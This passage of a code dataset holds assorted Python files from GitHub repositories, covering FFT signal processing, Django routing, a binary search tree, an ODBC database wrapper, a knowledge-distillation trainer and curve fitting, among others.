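assert np.allclose(dft_matrix(64) @ data, np.fft.fft(data, norm="ortho"))
assert np.allclose(fft(data), np.fft.fft(data, norm="ortho"))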
tone of length 1s with frequency f (default mid C: f = 261.626 Hz) and return the signal.\n\n Arguments:\n f: frequency of the tone\n\n Return:\n data: the generated signal\n \"\"\"\n\n # sampling range\n x_min = 0.0\n x_max = 1.0\n data = np.zeros(num_samples)\n\n for i in range (num_samples):\n data[i] = np.sin(2*np.pi*f*(i/(num_samples-1)))\n\n return data\n\n\ndef low_pass_filter(adata: np.ndarray, bandlimit: int = 1000, sampling_rate: int = 44100) -> np.ndarray:\n \"\"\"\n Filter high frequencies above bandlimit.\n\n Arguments:\n adata: data to be filtered\n bandlimit: bandlimit in Hz above which to cut off frequencies\n sampling_rate: sampling rate in samples/second\n\n Return:\n adata_filtered: filtered data\n \"\"\"\n \n # translate bandlimit from Hz to dataindex according to sampling rate and data size\n bandlimit_index = int(bandlimit*adata.size/sampling_rate)\n\n fdata = np.fft.fft(adata)\n for i in range(bandlimit_index + 1, adata.size - bandlimit_index):\n fdata[i] = 0\n \n\n adata_filtered = np.fft.ifft(fdata)\n adata_filtered = np.real(adata_filtered)\n return adata_filtered\n\n\nif __name__ == '__main__':\n print(\"All requested functions for the assignment have to be implemented in this file and uploaded to the \"\n \"server for the grading.\\nTo test your implemented functions you can \"\n \"implement/run tests in the file tests.py (> python3 -v test.py [Tests.]).\")\n","repo_name":"filiprejmus/-scientific-computing","sub_path":"main_Project3.py","file_name":"main_Project3.py","file_ext":"py","file_size_in_byte":5022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"11672792154","text":"from django.urls import path\nfrom django.contrib import admin\n#from .views import *\nfrom .views import home,loginUser,logoutUser,registerUser,applyPage,recruiterReg,seekerReg\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',home,name='home'),\n path('login/',loginUser,name='login'),\n path('logout/',logoutUser,name='logout'),\n path('register/recruiter',recruiterReg),\n path('register/seeker/',seekerReg),\n path('register/',registerUser,name='register'),\n path('apply/',applyPage,name='apply'),\n]\n\n\n\n\n#from django.urls import path,include\n#from django.conf import settings\n#from django.conf.urls.static import static\n\n#urlpatterns = [\n# path('admin/', admin.site.urls),\n# path('',include('JobPortal.urls'))\n#]+ static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)\n","repo_name":"FaisalSR21/recruitme","sub_path":"DataFlairJobPortal/JobPortal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71801336630","text":"import sys\nfrom collections import Counter\n\nN = int(sys.stdin.readline())\n\nnlist = []\nfor _ in range(N):\n nlist.append(int(sys.stdin.readline()))\nnlist.sort()\n\n# 최빈값구하기\ncnt = Counter(nlist).most_common()\nif len(cnt) > 1 and cnt[0][1] == cnt[1][1]:\n freq = cnt[1][0]\nelse:\n freq = cnt[0][0]\n\nprint(round(sum(nlist)/len(nlist)))\nprint(nlist[len(nlist)//2])\nprint(freq)\nprint(nlist[-1]-nlist[0])","repo_name":"hyein99/Algorithm_baekjoon","sub_path":"단계별/12_정렬/2108_통계학.py","file_name":"2108_통계학.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"2656767628","text":"import cv2\r\nimport numpy as np\r\nfrom json.decoder import 
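One caveat for the 2108 statistics record above: Python's round() performs banker's rounding (round(0.5) == 0 and round(-0.5) == 0), while this problem is commonly reported to expect the mean rounded half away from zero. A hedged alternative for the first print:

mean = sum(nlist) / len(nlist)
# round half away from zero, e.g. -0.5 -> -1 and 0.5 -> 1
print(int(mean + 0.5) if mean >= 0 else int(mean - 0.5))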
JSONDecodeError\r\nimport json\r\n\r\ndef specific(coordinate, classes):\r\n \r\n result = []\r\n \r\n if classes == 1:\r\n for i in range(len(coordinate)):\r\n if coordinate[i][5] == 4 or coordinate[i][5] == 5 or coordinate[i][5] == 6 or coordinate[i][5] == 7:\r\n if coordinate[i][4] >= 0.85:\r\n result.append(coordinate[i])\r\n else:\r\n for i in range(len(coordinate)):\r\n if coordinate[i][5] == classes:\r\n if coordinate[i][4] >= 0.7:\r\n result.append(coordinate[i])\r\n\r\n return np.array(result)\r\n \r\ndef drawBbox(img, coordinate,total_channel, fall_coor):\r\n for coor in coordinate:\r\n try:\r\n person_id, x1, y1, x2, y2 = coor\r\n\r\n total_channel.append(int(person_id))\r\n total_channel = list(set(total_channel))\r\n if person_id in fall_coor:\r\n cv2.rectangle(img, (int(x1), int(y1)), (int(x2), int(y2)), (0,0,255), 1)\r\n cv2.putText(img,\"Falling\", (int(x1), int(y1)-5), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255,0,0), 2)\r\n else:\r\n cv2.rectangle(img, (int(x1), int(y1)), (int(x2), int(y2)), (0,0,255), 1)\r\n \r\n except:\r\n x1,y1,x2,y2,_,_ = coor\r\n cv2.rectangle(img, (int(x1), int(y1)), (int(x2), int(y2)), (0,0,255), 1)\r\n cv2.putText(img,\"Falling\", (int(x1), int(y1)-5), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255,0,0), 2)\r\n\r\n\r\n return img, len(total_channel), total_channel\r\n \r\ndef NewDraw(img, coordinate, fall):\r\n for coor in coordinate:\r\n x1,y1,x2,y2,conf,classId = coor\r\n cv2.rectangle(img, (int(x1),int(y1)-90), (int(x2),int(y2)-90), color = (255,0,0), thickness = 2)\r\n\r\n for coor in fall:\r\n id, x1,y1,x2,y2 = coor\r\n cv2.rectangle(img, (int(x1),int(y1)-90), (int(x2),int(y2)-90), color = (0,0,255), thickness = 2)\r\n cv2.putText(img, \"Falling\", (int(x1), int(y1)-5), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2)\r\n\r\n return img\r\n\r\ndef openJson(filename):\r\n try:\r\n f = open(filename,'r')\r\n data = json.load(f)\r\n f.close()\r\n except JSONDecodeError:\r\n f.close()\r\n return \r\n return data\r\n\r\n\r\ndef timetoint(hour,minute,second):\r\n \r\n return ((hour*3600)+(minute*60)+second) \r\n\r\n","repo_name":"Aquos06/FDD_FIX","sub_path":"allutility/coorutil.py","file_name":"coorutil.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"73022287670","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\nfrom os import listdir\r\nfrom os.path import isfile, join, isdir\r\nimport numpy as np\r\n\r\nlePath = \"ILSVRC2014_DET_train\"\r\n\r\nsynsets = [d for d in listdir(lePath) if isdir(join(lePath,d))]\r\n\r\nsynsetDict = {syn: listdir(join(lePath, syn)) for syn in synsets}\r\n\r\nsynsetLen = np.array([len(k) for k in synsetDict.values()])\r\n\r\nusableSets = [syn for syn in synsets if len(synsetDict[syn])>=400]\r\n\r\nnp.random.seed(0)\r\nselectedSets = np.random.choice(usableSets, 100)\r\n\r\nwith open(\"ILSVRC2014_DET_train.txt\",'w') as outfile:\r\n for idx, syn in enumerate(list(selectedSets)):\r\n images = np.random.choice(synsetDict[syn],400)\r\n for image in images:\r\n outfile.writelines(join(syn, image) + '\\t' + \"{0}\".format(idx) + '\\n')\r\n","repo_name":"laura-rieger/max_switch_reconstruction_tunnel","sub_path":"dataset/ILSVRC2014_DET_train.py","file_name":"ILSVRC2014_DET_train.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"70290777911","text":"import sys\nimport pandas as pd\nfrom ExceptionLoggerAndUtils.logger import App_Logger\nfrom 
ExceptionLoggerAndUtils.exception import CustomException\nfrom ExceptionLoggerAndUtils.utils import load_object\n\nclass PredictPipline():\n def __init__(self):\n pass\n\n def predict(self,features):\n try:\n modelPath = \"artifacts/model.pkl\"\n preprocessorPath = \"artifacts/transformation.pkl\"\n model = load_object(file_path=modelPath)\n transformation = load_object(file_path=preprocessorPath)\n dataScaled = transformation.transform(features)\n pred = model.predict(dataScaled)\n return pred\n except Exception as e:\n raise CustomException(e, sys)\n\n\n\nclass CustomData():\n def __init__(self,Airline:str,Date_of_Journey:str,Source:str,Destination:str,\n Dep_Time:str,Arrival_Time:str,Duration:str,Total_Stops:str):\n self.Airline = Airline\n self.Date_of_Journey = Date_of_Journey\n self.Source = Source\n self.Destination = Destination\n self.Dep_Time = Dep_Time\n self.Arrival_Time = Arrival_Time\n self.Duration = Duration\n self.Total_Stops = Total_Stops\n\n def getDataAsDataFrame(self):\n inputDict = {\n \"Airline\": [self.Airline],\n \"Date_of_Journey\": [self.Date_of_Journey],\n \"Source\": [self.Source],\n \"Destination\": [self.Destination],\n \"Dep_Time\": [self.Dep_Time],\n \"Arrival_Time\": [self.Arrival_Time],\n \"Duration\": [self.Duration],\n \"Total_Stops\": [self.Total_Stops]\n\n }\n\n return pd.DataFrame(inputDict)\n\n def changeDatatypeOfColumn(self,pred_df):\n date_format = \"%Y-%m-%d %H:%M:%S\"\n pred_df['Date_of_Journey'] = pd.to_datetime(pred_df['Date_of_Journey'], format=date_format)\n pred_df['Dep_Time'] = pd.to_datetime(pred_df['Dep_Time'], format=date_format)\n pred_df['Arrival_Time'] = pd.to_datetime(pred_df['Arrival_Time'], format=date_format)\n\n return pred_df\n\n def convertDateInToDayMonthYear(self, df):\n \"\"\" Written By : Shivraj Shinde//Version: 1.0//Revisions: None\n Description : This will create three different columns Day,Month,Year.\n Output : Return dataFrame with independant Column as Day,Month,Year Columns\n On Failure : Raise Exception\n \"\"\"\n try:\n df['Day'] = pd.to_datetime(df[\"Date_of_Journey\"], format=\"%Y-%m-%d\").dt.day\n df['Month'] = pd.to_datetime(df['Date_of_Journey'], format=\"%Y-%m-%d\").dt.month\n df['Year'] = pd.to_datetime(df['Date_of_Journey'], format=\"%Y-%m-%d\").dt.year\n\n return df\n\n except Exception as e:\n raise CustomException(e, sys)\n\n def isertValueInDuration(self, pred_df):\n pred_df['Duration'] = pred_df['Arrival_Time'] - pred_df['Dep_Time']\n #hours = str()\n Hours = pd.to_datetime(pred_df['Duration']).dt.hour\n Minutes = pd.to_datetime(pred_df['Duration']).dt.minute\n print(Hours)\n print(Hours)\n\n pred_df['Duration'] = pred_df['Duration'].astype(str)\n\n pred_df['Duration'] = str(Hours[0])+\"h \"+str(Minutes[0])+\"m\"\n\n #minutes =str(pd.to_datetime(pred_df['Duration']).dt.minute + \"m \")\n #pred_df['Duration'] =hours +\"h \"+minutes + \"m \"\n\n\n return pred_df\n\n def dropUncessaryColumns(self,df):\n try:\n df = df.drop([\"Arrival_Time\",\"Dep_Time\",\"Date_of_Journey\",\"Duration\"], axis = 1)\n return df\n except Exception as e:\n raise CustomException(e, sys)\n","repo_name":"AtharvaButala/AirlineFarePrediction1","sub_path":"Source/prediction/predictionPipline.py","file_name":"predictionPipline.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"41894404210","text":"getData = input()\ndata = getData.split(\",\")\ndemandFree = int(data[0]) # 此商品免費時的需求量\nsaleAdd = float(data[1]) # 對方商品漲 1 
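isertValueInDuration above routes a timedelta column through pd.to_datetime, which expects datetimes, and then rebuilds the string through several redundant assignments. A simpler sketch using pandas' timedelta accessor; like the original it reports only the hour and minute components:

def isertValueInDuration(self, pred_df):
    delta = pred_df['Arrival_Time'] - pred_df['Dep_Time']
    comp = delta.dt.components   # days / hours / minutes / ...
    pred_df['Duration'] = (comp.hours.astype(str) + 'h '
                           + comp.minutes.astype(str) + 'm')
    return pred_df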
元時會增加的銷售量\ncost1 = int(data[2]) # 零售商 1 的商品成本\ncost2 = int(data[3]) # 零售商 2 的商品成本\niterationNum = int(data[4]) # 雙方共互動 n 輪\n\nr1_decisionList = []\nr2_decisionList = []\nr1_begin = (demandFree + cost1) / 2 # 零售商 1 第 0 輪決策\nr2_begin = (demandFree + saleAdd * r1_begin + cost2) / 2 # 零售商 2 第 0 輪決策\nr1_decisionList.append(r1_begin)\nr2_decisionList.append(r2_begin)\n\nfor i in range(iterationNum): # 零售商 2 根據零售商 1 的決策行動,共進行 n 輪\n r1_decision = (demandFree + saleAdd * r2_decisionList[-1] + cost1) / 2\n r1_decisionList.append(r1_decision)\n r2_decision = (demandFree + saleAdd * r1_decisionList[-1] + cost2) / 2\n r2_decisionList.append(r2_decision)\n\nEq1 = r1_decisionList[-1]\nEq2 = r2_decisionList[-1]\nprint(\"%0.2f %0.2f\" % (Eq1, Eq2)) # 最後的equilibrium情形","repo_name":"kevin900804/Programming_for_Business_Computing_in_Python_HW","sub_path":"用Python做商管程式設計(三)_價格競爭.py","file_name":"用Python做商管程式設計(三)_價格競爭.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"42270041055","text":"import torch\nfrom torch.utils.data import DataLoader\nimport pytorch_lightning as pl\nfrom distill_ai.modules import LogitsDistillationModule\n\n\nclass KnowledgeDistillationTrainer(pl.Trainer):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def fit(\n self,\n teacher_model: torch.nn.Module,\n student_model: torch.nn.Module,\n train_dataloader: DataLoader,\n val_dataloader: DataLoader,\n student_target_loss: torch.nn.Module,\n distillation_loss: torch.nn.Module,\n optimizer: torch.optim.Optimizer = torch.optim.Adam,\n *args,\n **kwargs,\n ):\n distillation_module = LogitsDistillationModule(\n teacher_model=teacher_model,\n student_model=student_model,\n distillation_loss=distillation_loss,\n student_target_loss=student_target_loss,\n optimizer=optimizer,\n *args,\n **kwargs,\n )\n super().fit(\n distillation_module, train_dataloaders=train_dataloader, val_dataloaders=val_dataloader, *args, **kwargs\n )\n","repo_name":"samirsalman/distillai","sub_path":"distill_ai/trainers/distillation_trainer.py","file_name":"distillation_trainer.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"19514801260","text":"#!python3\r\n\r\n\"\"\"\r\nBinary Search Tree. With Hibbard's deletion. 
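The loop in the pricing record alternates two linear best responses, p1 = (demandFree + saleAdd*p2 + cost1)/2 and p2 = (demandFree + saleAdd*p1 + cost2)/2; for |saleAdd| < 2 the iteration is a contraction and converges to the unique fixed point, which can be computed in closed form instead of iterating:

denom = 4 - saleAdd ** 2
Eq1 = (2 * (demandFree + cost1) + saleAdd * (demandFree + cost2)) / denom
Eq2 = (2 * (demandFree + cost2) + saleAdd * (demandFree + cost1)) / denom
print("%0.2f %0.2f" % (Eq1, Eq2))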
Not balanced.\r\n\"\"\"\r\n\r\nimport unittest\r\n\r\n\r\nclass Node(object):\r\n def __init__(self, key, left=None, right=None):\r\n self.key = key\r\n self.left = left\r\n self.right = right\r\n\r\n\r\nclass BST:\r\n def __init__(self, root=None):\r\n self.root = root\r\n\r\n def put(self, key):\r\n self.root = self._put(self.root, key)\r\n\r\n def _put(self, x, key):\r\n if x is None:\r\n return Node(key)\r\n if key < x.key:\r\n x.left = self._put(x.left, key)\r\n elif x.key < key:\r\n x.right = self._put(x.right, key)\r\n else:\r\n x.key = key\r\n return x\r\n\r\n def inorder(self, n=None):\r\n if not n:\r\n n = self.root\r\n if n.left:\r\n yield from self.inorder(n.left)\r\n yield n.key\r\n if n.right:\r\n yield from self.inorder(n.right)\r\n\r\n def preorder(self, n=None):\r\n if not n:\r\n n = self.root\r\n if not n:\r\n return None\r\n yield n.key\r\n if n.left:\r\n yield from self.preorder(n.left)\r\n if n.right:\r\n yield from self.preorder(n.right)\r\n\r\n def __repr__(self):\r\n r = []\r\n def printer(lvl, n):\r\n if not n:\r\n return\r\n if n.right:\r\n printer(lvl+1, n.right)\r\n r.append((' ' * lvl) + str(n.key))\r\n if n.left:\r\n printer(lvl+1, n.left)\r\n printer(0, self.root)\r\n return ''\r\n\r\n def delete(self, key):\r\n self.root = self._delete(self.root, key)\r\n\r\n def _delete(self, n, key):\r\n \"\"\" Hibbard's eager deletion \"\"\"\r\n if not n:\r\n return n\r\n if n.key > key:\r\n n.left = self._delete(n.left, key)\r\n return n\r\n elif n.key < key:\r\n n.right = self._delete(n.right, key)\r\n return n\r\n\r\n # Found. Delete:\r\n if not n.left and not n.right:\r\n n = None\r\n elif not n.left or not n.right:\r\n n = n.left or n.right\r\n else:\r\n # Has left and right.\r\n t = n\r\n n = self.min(t.right)\r\n n.right = self.delete_min(t.right)\r\n n.left = t.left\r\n return n\r\n\r\n def min(self, n=None):\r\n if not n:\r\n n = self.root\r\n while n.left:\r\n n = n.left\r\n return n\r\n\r\n def delete_min(self, n):\r\n if n and n.left:\r\n n.left = self.delete_min(n.left)\r\n return n\r\n return n.right if n else None\r\n\r\n\r\nclass Tests(unittest.TestCase):\r\n def test_deletion(self):\r\n \"\"\"\r\n 5\r\n 2 7\r\n 1 3 6 10\r\n 9 11\r\n \"\"\"\r\n bst = BST()\r\n preorder = [5, 2, 1, 3, 7, 6, 10, 9, 11]\r\n for v in preorder:\r\n bst.put(v)\r\n self.assertEqual(list(bst.preorder()), preorder)\r\n bst.delete(7)\r\n self.assertEqual(list(bst.preorder()), [5, 2, 1, 3, 9, 6, 10, 11], repr(bst))\r\n bst.delete(9)\r\n self.assertEqual(list(bst.preorder()), [5, 2, 1, 3, 10, 6, 11], repr(bst))\r\n bst.delete(10)\r\n self.assertEqual(list(bst.preorder()), [5, 2, 1, 3, 11, 6], repr(bst))\r\n bst.delete(11)\r\n self.assertEqual(list(bst.preorder()), [5, 2, 1, 3, 6], repr(bst))\r\n bst.delete(6)\r\n self.assertEqual(list(bst.preorder()), [5, 2, 1, 3], repr(bst))\r\n bst.delete(2)\r\n self.assertEqual(list(bst.preorder()), [5, 3, 1], repr(bst))\r\n bst.delete(3)\r\n self.assertEqual(list(bst.preorder()), [5, 1], repr(bst))\r\n bst.delete(5)\r\n self.assertEqual(list(bst.preorder()), [1], repr(bst))\r\n bst.delete(1)\r\n self.assertEqual(list(bst.preorder()), [], repr(bst))\r\n bst.delete(1)\r\n bst.delete(1)\r\n\r\n\r\nunittest.main()\r\n","repo_name":"artkpv/code-dojo","sub_path":"_algos/ds/bst/bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"31420727676","text":"from unittest import TestCase\n\nfrom HzzProlog.HzzProlog import 
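A quick property check complementing the unit tests for the BST above: after arbitrary puts and Hibbard deletions, an inorder traversal must still yield the remaining keys in ascending order.

import random
bst, keys = BST(), list(range(32))
random.shuffle(keys)
for k in keys:
    bst.put(k)
for k in random.sample(keys, 10):
    bst.delete(k)
inorder = list(bst.inorder())
assert inorder == sorted(inorder) and len(inorder) == 22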
HzzProlog\nfrom HzzProlog.PrologCallable import define_parameterized_predicate\nfrom HzzProlog.test_util import remove_trailing_false_or_true\nfrom definitions.builtin_predicates import member\nfrom definitions.paths import TIME_PROCESSING_UTILITIES_PL_PATH\nfrom definitions.predicates import unique_call\nfrom definitions.variables import X, Result, _, Y, Y1, X1\nfrom tests.testing_utils.get_list_from_list_of_dicts import get_list_from_list_of_dicts\n\nfact = define_parameterized_predicate(\"fact\")\n\n\n\nclass TestUniqueCall(TestCase):\n def setUp(self) -> None:\n self.prolog = HzzProlog(TIME_PROCESSING_UTILITIES_PL_PATH)\n\n\n def test__should_be_able_to_handle_zero_result(self):\n result = self.prolog.query(unique_call(\n X, member(X, []), Result\n ))\n result = remove_trailing_false_or_true(result)\n result = get_list_from_list_of_dicts(result, \"Result\")\n self.assertCountEqual([], result)\n\n def test__should_not_alter_any_single_result(self):\n result = self.prolog.query(unique_call(\n X, member(X, [1]), Result\n ))\n result = remove_trailing_false_or_true(result)\n result = get_list_from_list_of_dicts(result, \"Result\")\n self.assertCountEqual([1], result)\n\n def test__should_remove_duplication_from_the_original_call(self):\n result = self.prolog.query(unique_call(\n X, member(X, [1, 1]), Result\n ))\n result = remove_trailing_false_or_true(result)\n result = get_list_from_list_of_dicts(result, \"Result\")\n self.assertCountEqual([1], result)\n\n def test__should_remove_duplication_from_the_original_call__preserve_distinct_values(self):\n result = self.prolog.query(unique_call(\n X, member(X, [1, 1, 2, 2, 3, 3]), Result\n ))\n result = remove_trailing_false_or_true(result)\n result = get_list_from_list_of_dicts(result, \"Result\")\n self.assertCountEqual([1, 2, 3], result) # don't care order\n\n def test__should_remove_duplication_from_the_original_call__multiple_param_at_once(self):\n self.prolog.add_facts('hzztime_defintitions', [\n fact(1, 2, 3),\n fact(0, 2, 3),\n fact(1, 2, 4),\n fact(0, 2, 4),\n fact(1, 3, 2),\n fact(0, 3, 4),\n fact(1, 3, 4),\n ])\n result = self.prolog.query(unique_call(\n [X, Y],\n fact(_, X, Y),\n [X1, Y1]\n ), print_query=True)\n result = remove_trailing_false_or_true(result)\n self.assertCountEqual([\n {'X1': 2, 'Y1': 3},\n {'X1': 2, 'Y1': 4},\n {'X1': 3, 'Y1': 2},\n {'X1': 3, 'Y1': 4},\n ], result) # don't care order\n","repo_name":"Hzzkygcs/heizscheduler-prolog","sub_path":"python/tests/time_processing_utilities/UniqueCall_test.py","file_name":"UniqueCall_test.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24382493400","text":"# Interface to a database connected via ODBC\n\nimport pyodbc\nfrom .db_int import DatabaseInterface\n\n\nclass DatabaseInterfaceOdbc(DatabaseInterface):\n\n def __init__(self, dsn, logger):\n super().__init__(logger)\n self._conn = pyodbc.connect(f\"DSN={dsn}\", autocommit=True)\n\n def execute(self, script, params=None, returnrs=False, fetchone=False):\n if self._logger:\n self._logger.debug(f\"script: {script}\")\n cursor = self._conn.cursor()\n if params:\n self._logger.debug(f\"params: {params}\")\n rs = cursor.execute(script, params)\n else:\n rs = cursor.execute(script)\n\n if fetchone:\n return rs.fetchone() is not None\n\n if returnrs:\n return rs\n\n def query(self, script, params=None):\n rs = self.execute(script, params, returnrs=True)\n l = []\n cols = [e[0] for e in rs.description]\n for row in rs:\n d = 
dict(zip(cols, row))\n l.append(d)\n return l\n\n def find(self, dbtype):\n dbtype.set_private_fields()\n script, params = dbtype.get_select_clause()\n return self.execute(script, params, fetchone=True)\n\n def delete(self, dbtype):\n dbtype.set_private_fields()\n script, params = dbtype.get_delete_clause()\n self.execute(script, params)\n\n def store(self, dbtype):\n if self.find(dbtype):\n script, params = dbtype.get_update_clause()\n else:\n script, params = dbtype.get_insert_clause()\n self.execute(script, params)\n\n\n def create(self, dbtype):\n raise NotImplementedError\n","repo_name":"sanjayrisbud/py-scrape","sub_path":"framework/db_odbc.py","file_name":"db_odbc.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"5131382021","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import chisquare\nfrom scipy.stats import chi2\n\n\n\n\nclass fitting(object):\n def __call__(self, data, bins, fit_func, guess):\n self.guess = guess\n self.bins = bins\n self.data = data\n self.fit_func = fit_func\n # Histogram\n self.hist, self.bin_edges = np.histogram(self.data, bins=self.bins)\n self.bin_centers = (self.bin_edges[:-1] + self.bin_edges[1:])/2\n\n # Fitting function call\n try:\n self.coeff, self.var_matrix = curve_fit(self.fit_func, self.bin_centers,\n self.hist, p0=self.guess)\n self.perr = np.sqrt(np.absolute(np.diag(self.var_matrix)))\n # Error in parameter estimation\n except:\n print(\"Fitting Problems\")\n self.coeff = np.array(self.guess)\n self.perr = np.array(self.guess)\n #Gets fitted function and residues\n self.hist_fit = self.fit_func(self.bin_centers, *self.coeff)\n self.xi2, self.p = chisquare(f_obs=self.hist,f_exp=self.hist_fit)\n\n def evaluate(self,in_data):\n return self.fit_func(in_data,*self.coeff)\n\n\nclass fitting_nohist(object):\n def __call__(self, data, time, fit_func, guess, method, bounds):\n self.bins = time\n self.data = data\n self.fit_func = fit_func\n self.guess = guess\n\n # Fitting function call\n try:\n if (method=='lm'):\n self.coeff, self.var_matrix = curve_fit(self.fit_func, self.bins,\n self.data, p0=self.guess,\n method=method)\n self.perr = np.sqrt(np.absolute(np.diag(self.var_matrix)))\n self.fit = self.fit_func(self.bins, *self.coeff)\n self.r_sqr = self.R_square()\n else:\n self.coeff, self.var_matrix = curve_fit(self.fit_func, self.bins,\n self.data, p0=self.guess,\n method=method,\n bounds=bounds)\n self.perr = np.sqrt(np.absolute(np.diag(self.var_matrix)))\n self.fit = self.fit_func(self.bins, *self.coeff)\n self.r_sqr = self.R_square()\n #Gets fitted function and R_square value for GOF\n\n # Error in parameter estimation\n except:\n print(\"Fitting Problems\")\n self.coeff = np.zeros(len(self.guess))\n self.perr = np.ones(len(self.guess))*np.Inf\n self.r_sqr = 1E6\n\n\n def evaluate(self,in_data):\n return self.fit_func(in_data,*self.coeff)\n\n def R_square(self):\n # WARNING: R^2 Lineal\n ss_res = np.sum((self.data-self.fit)**2)\n ss_tot = np.sum((self.data-np.mean(self.data))**2)\n return 1-(ss_res / ss_tot)\n\n\n\nclass gompertz(fitting_nohist):\n\n def Gomp_n(self,x, n, *param):\n def Gomp(x, *param_inner):\n return (param_inner[0]/(1.0+np.exp(((x**2.0)-(param_inner[1]**2.0))*param_inner[2])))\n aux=np.zeros(len(x))\n for i in range(n):\n param_inner = [i for i in param[i*3+1:(i+1)*3+1]]\n aux = aux + Gomp(x,*param_inner)\n return aux + 
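A minimal usage sketch for the ODBC wrapper above; the DSN name 'mydsn' and the users table are placeholders, and the ? parameter marker is pyodbc's positional placeholder as used by execute():

import logging

db = DatabaseInterfaceOdbc("mydsn", logging.getLogger(__name__))
rows = db.query("SELECT id, name FROM users WHERE id = ?", (1,))
for row in rows:   # query() returns one {column: value} dict per row
    print(row["id"], row["name"])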
param[0]\n\n def __call__(self, data, time, n, p0, method, bounds):\n def G_aux(x,*param):\n return self.Gomp_n(x,n,*param)\n # lambda x,*param: self.Gompertz(x,n,*param)\n super(gompertz,self).__call__( data=data,\n time=time,\n fit_func= G_aux,\n guess=p0,\n method = method,\n bounds = bounds)\n if len(self.coeff)>0:\n # Sort coefficients by alfa frequency\n alfa_f_array = self.coeff[2::3]\n order = np.argsort(alfa_f_array)\n order_full = np.concatenate([[i*3+2-1,i*3+2,i*3+2+1] for i in order], axis=0)\n self.coeff = np.concatenate([[self.coeff[0]],self.coeff[order_full]], axis=0)\n\n def plot(self,axis,title,xlabel,ylabel,res=True,fit=True):\n axis.plot(self.data, self.bins, align='mid', facecolor='green', edgecolor='white', linewidth=0.5)\n # axis.set_xlabel(xlabel)\n # axis.set_ylabel(ylabel)\n # axis.set_title(title)\n # if (fit==True):\n # axis.plot(self.bin_centers, self.hist_fit, 'r--', linewidth=1)\n # if (res==True):\n # axis.text(0.95,0.95, (('$\\mu$=%0.3f (+/- %0.3f) \\n'+\\\n # '$\\sigma$=%0.3f (+/- %0.3f) \\n'+\n # 'FWHM=%0.3f (+/- %0.3f) \\n'+\\\n # 'Res=%0.3f%% (+/- %0.3f) \\n'+\\\n # 'chi2=%0.3f \\n'+'chi2inv_95=%0.3f \\n'+\\\n # 'p=%0.3f') % \\\n # (self.coeff[1] , self.perr[1],\n # np.absolute(self.coeff[2]) , self.perr[2],\n # 2.35*np.absolute(self.coeff[2]),\n # 2.35*np.absolute(self.perr[2]),\n # 2.35*np.absolute(self.coeff[2])*100/self.coeff[1],\n # 2.35*np.absolute(self.coeff[2])*100/self.coeff[1]*\n # np.sqrt((self.perr[2]/self.coeff[2])**2+\n # (self.perr[1]/self.coeff[1])**2),\n # self.xi2,\n # chi2.ppf(0.95,len(self.bin_centers)-2-1),\n # self.p\n # )\n # ),\n # fontsize=8,\n # verticalalignment='top',\n # horizontalalignment='right',\n # transform=axis.transAxes)\n #\n #\n # else:\n # # No resolution calculation\n # axis.text(0.95,0.95, (('$\\mu$=%0.3f (+/- %0.3f) \\n'+\\\n # '$\\sigma$=%0.3f (+/- %0.3f) \\n'+\n # 'FWHM=%0.3f (+/- %0.3f) \\n'+\\\n # 'chi2=%0.3f \\n'+'chi2inv_95=%0.3f \\n'+\\\n # 'p=%0.3f') % \\\n # (self.coeff[1], self.perr[1],\n # np.absolute(self.coeff[2]), self.perr[2],\n # 2.35*np.absolute(self.coeff[2]),\n # 2.35*np.absolute(self.perr[2]),\n # self.xi2,\n # chi2.ppf(0.95,len(self.bin_centers)-2-1),\n # self.p)),\n # fontsize=8,\n # verticalalignment='top',\n # horizontalalignment='right',\n # transform=axis.transAxes)\n\n\nclass double_exp_fit(fitting_nohist):\n\n def double_exp(x, *param):\n alfa = 1.0/param[1]\n beta = 1.0/param[0]\n t_p = np.log(beta/alfa)/(beta-alfa)\n K = (beta)*np.exp(alfa*t_p)/(beta-alfa)\n f = param[2]*K*(np.exp(-(x-param[3])*alfa)-np.exp(-(x-param[3])*beta))\n f[f<0] = 0\n return f\n\n def __call__(self, data, time, guess):\n # First guess\n super(double_exp_fit,self).__call__(data=data,\n time=time,\n fit_func=self.double_exp,\n guess=guess)\n\n def plot(self,axis,title,xlabel,ylabel,res=True,fit=True):\n #axis.hist(self.data, self.bins, align='mid', facecolor='green', edgecolor='white', linewidth=0.5)\n axis.set_xlabel(xlabel)\n axis.set_ylabel(ylabel)\n axis.set_title(title)\n if (fit==True):\n axis.plot(self.bins, self.fit, 'r--', linewidth=1)\n 